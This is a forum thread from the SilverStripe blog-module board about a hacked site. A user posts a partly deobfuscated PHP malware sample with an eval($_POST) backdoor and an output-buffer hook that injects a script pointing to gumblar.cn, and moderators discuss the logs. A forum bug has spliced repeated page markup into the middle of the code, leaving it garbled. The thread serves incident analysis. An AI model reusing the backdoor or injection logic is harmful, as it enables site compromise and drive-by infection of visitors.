Skip to main content

This site requires you to update your browser. Your browsing experience maybe affected by not having the most up to date version.

BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/ » Blog Module

We've moved the forum!

Please use forum.silverstripe.org for any new questions (announcement).
The forum archive will stick around, but will be read only.

You can also use our Slack channel or StackOverflow to ask for help.
Check out our community overview for more options to contribute.

Blog Module /

Discuss the Blog Module.

Moderators: martimiz, Sean, Ed, biapar, Willr, Ingo, swaiba

BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/

Go to End


20 Posts   12879 Views

Avatar
Ingo

Forum Moderator, 801 Posts

8 May 2009 at 8:56am

> I also discovered that all the HTML files outside the Silverstripe installation had also been modified on the same date, as well as a the javascript ".js" files

Hm, could be a sign that the actual hack came from somewhere else, although not a very strong indicator. I've looked through the log files provided by Hugo in the timeframe in question (both apache access and error), nothing suspicious comes up. The server is a shared environment, so others installed applications might have been the cause of the hack, its hard to tell. For now, thats all we can do - we can't find any direct evidence that the hack was caused by a SilverStripe vulnerability.

Avatar
stayatplay

Community Member, 13 Posts

8 May 2009 at 1:14pm

Edited: 08/05/2009 1:27pm

It's only shared insofar as other web sites hosted by Hostway are likely on the same machine. Each account is completely separate from any other.

The only large, complex software installed is Silverstripe, the hack happened shortly after I installed it. Silverstripe malfunctioned while I was online using it, which is why I noticed the hack happening. Likely that the html files and the rest were changed by a script - the same script that php files in Silverstripe were propagating since everything has the same date/time for the modified date.

Someone good at php has to look at the php code and analyze what it actually does, I decoded some of it below, making it easier to read.

The javascript injected directs clients to that web site in China - maybe to make a "map" of ip addresses of exploitable non Windows Vista machines for a botnet for example. It's highly unlikely that it was something outside of Silverstripe causing this first since Silverstripe is the only complex PHP code that was compromised and it includes the ability to write on the server.

Here is the HACK of the php code in Silverstripe - easier to read.



<?php 


	if( !function_exists('--THE_HACK--') )
	{
		
			if(isset($_POST['--THE_HACK_NR_3--']))  eval($_POST['--THE_HACK_NR_3--']);
			
			
			if(!defined('--THE_JAVASCRIPT_HACK--')) define
				(
					'--THE_JAVASCRIPT_HACK--',
					
					"
						<script language=javascript><!-- 
						(
							function(CqPA)
							{
											// if using this browser combination Windows, but not Vista,  (navigator.userAgent.indexOf("Win")>0) && (navigator.userAgent.indexOf("NT 6")<0) 
											// and the cookie is not set, (&& (document.cookie.indexOf("miek=1")<0) )
											// Then write this once in the document...
											// <script src=//gumblar.cn/rss/?id=""><\/script>
							}
						)
						 --></script>
					"
				 
				 );
		
		
			function --THE_HACK--($s)
			{
			
				if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
				
				if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5)
				{
				
					$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
					if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
				
				}
				
				
				$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
				
				if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',--THE_JAVASCRIPT_HACK--.'\1',$s1);
				elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

			(function($) {
				$(document).ready(function() {
					var popupElements = $('a.fancy');
					if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true}); 
				});
			})(jQuery);
		

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

			(function($) {
				$(document).ready(function() {
					var popupElements = $('a.fancy');
					if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true}); 
				});
			})(jQuery);
		

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

			(function($) {
				$(document).ready(function() {
					var popupElements = $('a.fancy');
					if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true}); 
				});
			})(jQuery);
		

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

			(function($) {
				$(document).ready(function() {
					var popupElements = $('a.fancy');
					if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true}); 
				});
			})(jQuery);
		

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

			(function($) {
				$(document).ready(function() {
					var popupElements = $('a.fancy');
					if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true}); 
				});
			})(jQuery);
		

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

			(function($) {
				$(document).ready(function() {
					var popupElements = $('a.fancy');
					if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true}); 
				});
			})(jQuery);
		

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

			(function($) {
				$(document).ready(function() {
					var popupElements = $('a.fancy');
					if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true}); 
				});
			})(jQuery);
		

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

			(function($) {
				$(document).ready(function() {
					var popupElements = $('a.fancy');
					if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true}); 
				});
			})(jQuery);
		

//]]></script>'))$s=$s1.--THE_JAVASCRIPT_HACK--;
				return $g?gzencode($s):$s;
			
			}
		
		
			function --THE_HACK_NR_2--($a=0,$b=0,$c=0,$d=0)
			{
				
				$s=array();
				
				if($b&&$GLOBALS['--THE_JAVASCRIPT_HACK--'])call_user_func($GLOBALS['--THE_JAVASCRIPT_HACK--'],$a,$b,$c,$d);
				foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='--THE_HACK--')return;
				else $s[]=array($a=='default output handler'?false:$a);
				
				for($i=count($s)-1;$i>=0;$i--)
				{
					$s[$i][1]=ob_get_contents();
					ob_end_clean();
				}
			
				ob_start('--THE_HACK--');
			
				for($i=0;$i<count($s);$i++)
				{
				ob_start($s[$i][0]);
				echo $s[$i][1];
				}
			
			}

	
	}


	if ( ($a=@set_error_handler('--THE_HACK_NR_2--'))!='--THE_HACK_NR_2--')
		$GLOBALS['--THE_JAVASCRIPT_HACK--']=$a;
	--THE_HACK_NR_2--();


?>


<?php echo("\n"); ?>

Avatar
stayatplay

Community Member, 13 Posts

8 May 2009 at 1:31pm

Edited: 08/05/2009 1:44pm

Well ain't that funny... I just noticed that a whole bunch of silverstripe.org SERVER CODE is being spit into the comments I posted between the CODE tags... *THAT* is a bug, for sure.

Look at these 3 forum pages and do a search for "silverstripe.org" so you can see what I mean.
I didn't notice earlier because I had just posted the code, so I didn't read through it.

But it's BAD news for Silverstripe.
Glad we noticed it though, so it can be fixed.

-Hugo.
P.S. The actual HACK code in easier-to-read format is attached in this post.

Attached Files
Avatar
Ingo

Forum Moderator, 801 Posts

8 May 2009 at 1:58pm

Edited: 08/05/2009 1:58pm

I've filed a ticket for the bug you discovered in the forum code - seems to be not very critical as it doesn't execute any serverside code, just includes markup in the wrong place that would show on the page anyway: http://open.silverstripe.com/ticket/4026. Let me know if you got any PHP or javascript code being executed in the "code" tag, because that would be quite a sensitive issue. Use security /at/ silverstripe /dot/ com for this.

> Someone good at php has to look at the php code and analyze what it actually does, I decoded some of it below, making it easier to read.

While thats good to see what the attack actually does, its not helpful to find out how this code got there in the first place. We couldn't find anything relating to this in the logs, so posting the attack code won't help us in the investigation, sorry.

Go to Top
Go to TopReturn to top